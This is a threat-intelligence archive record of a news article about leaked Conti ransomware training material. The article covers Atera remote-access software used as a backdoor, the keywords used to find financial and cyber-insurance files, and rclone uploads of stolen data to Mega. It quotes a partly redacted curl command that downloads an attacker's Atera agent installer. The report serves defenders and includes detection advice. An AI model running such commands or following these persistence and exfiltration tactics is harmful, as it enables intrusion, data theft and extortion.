{
	"id": "2e79f3d2-48d5-43a6-bcda-3dad50f6c6ea",
	"created_at": "2026-04-06T00:07:30.107828Z",
	"updated_at": "2026-04-10T03:24:23.801799Z",
	"deleted_at": null,
	"sha1_hash": "5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d",
	"title": "Conti ransomware prioritizes revenue and cyberinsurance data theft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1871635,
	"plain_text": "Conti ransomware prioritizes revenue and cyberinsurance data theft\r\nBy Lawrence Abrams\r\nPublished: 2021-08-17 · Archived: 2026-04-05 16:23:25 UTC\r\nTraining material used by Conti ransomware affiliates was leaked online this month, allowing an inside look at how\r\nattackers abuse legitimate software and seek out cyber insurance policies.\r\nEarlier this month, a disgruntled affiliate posted to a hacking forum the IP addresses for Cobalt Strike C2 servers used by the\r\ngang and a 113 MB archive containing training material for conducting ransomware attacks.\r\nForum post from disgruntled affiliate\r\nUsing this leaked training material, security researchers, network admins, and incident responders can better respond to\r\nattacks and quickly find common indicators of compromise (IOCs) used by the ransomware gang.\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 1 of 5\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 2 of 5\n\nVisit Advertiser websiteGO TO PAGE\r\nThis is exactly the case with new research released by Advanced Intel's CEO Vitali Kremez that illustrates how actual Conti\r\nattacks utilized the leaked information.\r\nLegitimate remote access software used as backdoors\r\nAn interesting tactic used by the ransomware gang is using the legitimate Atera remote access software as a backdoor for\r\ncontinued persistence.\r\nWhen conducting an attack, ransomware operations commonly deploy Cobalt Strike beacons that the attackers can use to\r\nexecute commands remotely and gain continued access to a network.\r\nHowever, security software products have become more adept at detecting Cobalt strike beacons, leading to a loss of access\r\nfor the threat actors.\r\nTo prevent this, Kremez states that the Conti gang is installing the legitimate Atera remote access software on compromised\r\nsystems, which the security software won't detect.\r\nConti ransomware attack flow\r\nSource: Advanced Intel\r\nAtera is a remote management service where you deploy agents to your endpoints so that you can manage them all from a\r\nsingle console. By deploying agents to all compromised devices on a network, the Conti threat actors will gain remote\r\naccess to any device from a single platform.\r\nKremez states that they have seen the following command used by Conti affiliates to install Atera on a compromised device:\r\nshell curl -o setup.msi \"http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1\u0026integratorLogin=REDACTED%40prot\r\n\"In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to\r\nreceive an agent installation script and console access,\" explained Kremez in a blog post about Conti using Atera.\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 3 of 5\n\nKremez advises admins to use whitelisting tools to block or audit command-line tools such as 'curl' to detect malicious\r\nactivity.\r\n\"Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies\r\nwith the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from\r\nC:\\ProgramData and C:\\Temp directory,\" advises Kremez.\r\nConti targets insurance, banking files\r\nOne of the leaked documents titled 'CobaltStrike MANUAL_V2 .docx' details the specific steps that an affiliate should use\r\nwhen conducting a Conti ransomware attack.\r\nAfter the first stage of the attack, which is to breach the network, gather credentials, and gain control of the Windows\r\ndomain, the threat actors tell their affiliates to start exfiltrating data from the compromised network.\r\nThis stage is essential for the attackers, as files are not only used to scare victims into paying a ransom, but stolen\r\naccounting and insurance policy documents are also used to generate the initial ransom amount and perform negotiations.\r\nWhen first exfiltrating data from the victim's servers, the Conti ransomware gang will specifically look for documents\r\nrelated to the company's financials and whether they have a cybersecurity policy.\r\n\"search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh. especially important, cyber\r\ninsurance, security policy documents,\" reads the translated Conti training document.\r\nIn particular, the threat actors look for the following keywords as part of their first data exfiltration steps:\r\ncyber\r\npolicy\r\ninsurance\r\nendorsement\r\nsupplementary\r\nunderwriting\r\nterms\r\nbank\r\n2020\r\n2021\r\nStatement\r\nThe ransomware gang tells the affiliates to \"prepares datapack right away\" and immediately upload the data to Mega, which\r\nthey used as a hosting platform for the exfiltrated data.\r\nKremez said that the attackers use the legitimate 'rclone' program to upload the data directly to the Mega cloud storage\r\nservice.\r\n\"Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is\r\nestablished. The needed network shares are assigned within the rclone.conf on the victim’s network and a command is\r\nexecuted,\" explains Kremez in a blog post.\r\nKremez states that you should focus on any rclone.exe command run from the C:\\ProgramData and C:\\Temp directories to\r\ndetect data exfiltration attempts.\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 4 of 5\n\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/"
	],
	"report_names": [
		"conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434050,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.pdf",
		"text": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.txt",
		"img": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.jpg"
	}
}